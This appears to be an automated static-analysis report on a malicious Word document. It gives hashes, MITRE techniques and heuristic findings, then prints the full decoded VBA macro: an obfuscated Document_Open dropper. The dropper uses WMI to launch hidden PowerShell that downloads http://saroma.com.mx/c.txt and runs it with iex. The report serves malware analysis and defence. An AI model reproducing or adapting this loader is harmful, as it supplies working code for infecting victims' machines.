Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 82f1b3c9ca44a6ab…

MALICIOUS

Office (OLE)

514.5 KB Created: 2016-04-08 04:15:00 Authoring application: Microsoft Office Word First seen: 2016-04-27
MD5: dc07e512c04653e24593545b28dc2d91 SHA-1: 4fee0c774fdc639ed467bee2233371aa1f630279 SHA-256: 82f1b3c9ca44a6ab8a984a473fb5033b0a182c135121bf6c3c514c4361116983
262 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing obfuscated VBA macros designed to execute automatically upon opening. The document body explicitly prompts the user to enable macros, presenting a common social engineering tactic. The VBA code appears to download and execute a second-stage payload from the URL http://saroma.com.mx/c.txt, as indicated by the ClamAV detection name 'Doc.Dropper.Agent-6537262-0' and the heuristic firings related to auto-execution and obfuscated loaders.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6537262-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6537262-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://saroma.com.mx/c.txt In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/rights/In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3223 bytes
SHA-256: 7b5cd7e554bd2ef7a8be5b100ad2673c92ff39b3bd2b5e4ba07fcbd87990afc3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function SqTpkuRcdB(fFMhggaWle As Variant, JhccsXpvUr As Integer)
        Dim tQbINoouvS, DeWSFVYrlv As String, TSEaNuXTpx, GzXmCDIVBC
        DeWSFVYrlv = ActiveDocument.Variables("qUQrf").Value()
        tQbINoouvS = ""
        TSEaNuXTpx = 1
        While TSEaNuXTpx < UBound(fFMhggaWle) + 2
        GzXmCDIVBC = TSEaNuXTpx Mod Len(DeWSFVYrlv): If GzXmCDIVBC = 0 Then GzXmCDIVBC = Len(DeWSFVYrlv)
        tQbINoouvS = tQbINoouvS + Chr(Asc(Mid(DeWSFVYrlv, GzXmCDIVBC + JhccsXpvUr, 1)) Xor CInt(fFMhggaWle(TSEaNuXTpx - 1)))
        TSEaNuXTpx = TSEaNuXTpx + 1
        Wend
        SqTpkuRcdB = tQbINoouvS
        End Function
        Public Function YqvzgwAOVoRgBLX()
    x1 = SqTpkuRcdB(Array(41, 13, 20, 8, 33, 24, 88, 40), 266)
    h = SqTpkuRcdB(Array(34, 64, 55), 263)
    o = SqTpkuRcdB(Array(67, 7, 61, 93, 16), 59) & SqTpkuRcdB(Array(38, 57, 9, 6, 3), 11) & SqTpkuRcdB(Array(90, 41, 61, 11), 302)
    Const HIDDEN_WINDOW = 0
    strComputer = SqTpkuRcdB(Array(96), 243)
    abcdef = h & SqTpkuRcdB(Array(24, 45, 84), 299)
    Set objWMIService = GetObject(SqTpkuRcdB(Array(68, 51, 9, 35, 80, 95, 48, 24, 99, 17, 62), 0) & strComputer & SqTpkuRcdB(Array(100, 55, 92, 9, 76, 44, 15, 3, 40, 55, 104), 244))
    Set objStartup = objWMIService.Get(SqTpkuRcdB(Array(99, 47, 31, 74, 83, 16, 53, 51, 10, 82, 51, 39, 26, 29, 29, 87, 58, 32, 65, 2), 223))
    Set objConfig = objStartup.SpawnInstance_
    objConfig.ShowWindow = HIDDEN_WINDOW
    Set objProcess = GetObject(SqTpkuRcdB(Array(68, 51, 9, 35, 80, 95, 48, 24, 99, 17, 62), 0) & strComputer & SqTpkuRcdB(Array(22, 28, 37, 54, 18, 40, 15, 57, 7, 53, 116, 79, 37, 91, 28, 4, 86, 109, 31, 16, 57, _
55, 43, 63, 70), 274))
    objProcess.Create o & SqTpkuRcdB(Array(18, 99, 19, 12, 46, 14, 52, 18, 34, 14, 27, 36, 53, 38, 6, 23, 20, 77, 9, 26, 33, _
7, 34, 30, 68, 67, 29, 2, 61, 28, 31, 60, 58, 71, 14, 46, 8, 101, 14, 40, 45, _
0, 11, 31, 121, 106, 47, 3, 19, 65, 54, 10, 35, 45, 47, 22, 85, 12, 25, 87, 17, _
40, 66, 83, 93, 22, 66, 29, 31, 107, 25, 63, 0, 27, 36, 26, 6, 0, 55, 125, 78, _
9, 3, 67, 8, 75, 117, 85, 0, 112, 114, 79, 84, 8, 88, 12, 21, 78, 76, 61, 17, _
27, 21, 10, 14, 101, 32, 86, 61, 65, 96, 54, 81, 11, 36, 45, 1, 59, 60, 66, 116), 64) & x1 & abcdef & "('http://saroma.com.mx/c.txt') | iex } else {(new-object Net.WebClient)." & x1 & abcdef & "('http://saroma.com.mx/c.txt') | iex}", Null, objConfig, intProcessID
    MsgBox (SqTpkuRcdB(Array(27, 4, 26, 40, 88, 39, 27, 49, 14, 36, 18, 41, 4, 45, 67, 34, 23, 47, 34, 70, 34, _
90, 86, 19, 87, 71, 116, 63, 12, 53, 48, 41, 35, 13, 93, 54, 66), 186))
End Function

Private Sub Document_Open()
If ActiveDocument.Variables("qUQrf").Value <> "toto" Then
        YqvzgwAOVoRgBLX
        ActiveDocument.Variables("qUQrf").Value = "toto"
        If ActiveDocument.ReadOnly = False Then
        ActiveDocument.Save
        End If
        End If
        End Sub